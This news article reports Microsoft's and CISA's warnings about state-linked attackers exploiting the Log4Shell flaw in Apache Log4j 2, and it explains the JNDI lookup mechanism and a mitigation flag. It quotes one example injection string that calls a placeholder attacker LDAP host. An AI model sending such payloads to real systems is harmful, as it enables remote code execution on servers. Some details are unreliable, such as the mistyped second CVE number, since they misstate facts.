Microsoft is once again sounding the alarm on a state-sponsored cyberattack, this one making makes use of a Java logging library know as CVE-2021-44228 or the Log4j2 (“log forge”) bug.
Microsoft believes state sanctioned hacks from countries such as Iran, North Korea, Turkey and China have begun to use more sophisticated techniques to exploit the widely used Java-based Log4j2 logging protocol to gain remote access to compromised devices.
Microsoft’s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell.
The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern of attack would appear in a web request log with strings like the following:
${jndi:ldap://[attacker site]/a}
Lending credence to Microsoft’s claims is the US Cybersecurity and Infrastructure Security Agency (CISA) which also documented widespread use of the Log4Shell exploit.
When speaking with CNN yesterday, Jen Easterly, director of CISA reiterated the dire situation devices, services and the internet as whole is going to be in if counter measures aren’t implemented swiftly.
This vulnerability is one of the most serious that I’ve seen in my entire career, if not the most serious.
We expect the vulnerability to be widely exploited by sophisticated actors and we have limited time to take necessary steps in order to reduce the likelihood of damage.
In Microsoft’s warning, the company points to a double-prong issue with Log4j2 as a flaw that includes the ability to easily exploit its bug as well as how many products have been built on it. Apache Log4j2 is among the most popular java logging libraries in current use.
Specifically, logging libraries are used to give developers added information about services and products by giving them the control over the amount of data gathered during the execution of an application or when users log in bug reports or functionality issues with a specific service or device.
When using log libraries developers can gain insight into or gather information about devices that include CPU type, GPU model, driver versions, system memory, and more.
An attacker performs an HTTP request against a target system, which generates a log using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.
One known use of the exploit in the wild involves Microsoft’s own Minecraft servers used as conduits for hackers to implement small messages in chat boxes to control users’ systems via the Log4j bug.
In the case of Minecraft, attackers were able to get remote code execution on Minecraft Servers by simply pasting a a short message into the chat box.
— Marcus Hutchins (@MalwareTechBlog) December 10, 2021
To-date there have been over 400,000 downloads from its GitHub project according to cybersecurity firm Check Point. To make matters worse is that it’s used by handfuls of popular companies worldwide that include not only Microsoft but Twitter, Apple, Amazon, Baidu, Cloudflare, NetEase, and Cloudflare to list a few.
As of now, Apache has released a fix that should cover all effected versions of the logging package which includes 2.0-beta-9 to 2.14.1. Unfortunately, each companies implements Log4j differently and the speed at which they apply the fix can still potentially leave millions of customers data exposed.
If you can’t upgrade log4j, you can mitigate the RCE vulnerability by setting log4j2.formatMsgNoLookups to True (-Dlog4j2.formatMsgNoLookups=true in JVM command line).
— Marcus Hutchins (@MalwareTechBlog) December 10, 2021
While companies scramble to apply patches, hackers are doubling their efforts to exploit Log4j and at exponential rates. According to a recent report by Check Point, there have been over 800,000 attacks with multiple variants leveraging the Log4j2 bug in the past six days.
To make matters worse, there appears to be a second vulnerability CVE-2921-45046 which was recently discovered as an additional exploit hacker are leveraging while more publicized Log4j2 bug is being addressed.
For its part, Microsoft is offering several solutions that can be found on its Microsoft Securities blog post regarding Log4j2 for both Windows and Linux platforms through its Microsoft 365 Defender as well as Endpoint.
